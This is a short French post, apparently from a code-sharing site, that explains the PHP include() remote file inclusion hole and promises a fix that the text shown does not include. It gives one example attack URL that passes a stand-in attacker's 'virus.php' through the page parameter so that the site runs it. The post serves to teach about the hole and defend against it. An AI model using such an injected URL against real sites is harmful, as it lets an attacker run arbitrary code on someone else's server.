EXPLICATION :
La "faille" include() se manifeste lorsque l'on utilise cette instruction :
include($page); /* où $page est une variable contenant un nom de page à inclure */
Le problème (la "faille"), c'est que cette variable $page est aussi et surtout accessible par l'utilisateur via l'url.
En effet, s'il tape, par exemple :
http://www.votre_site.com/index.php?page=http:/ /www.site_attaquant.com/virus.php
il "inclura" alors le script 'virus.php' dans votre site et pourra alors faire à peu près tout ce qu'il veut, d'où l'importance de combler cette faille...
Je sais qu'il y a d'autre(s) source(s) déjà qui propose(nt) une solution pour boucher la faille include(), mais elle(s) ne me convenai(en)t pas.
J'ai donc dû trouver autre chose.
Voilà keuwa, enjoy fellas!!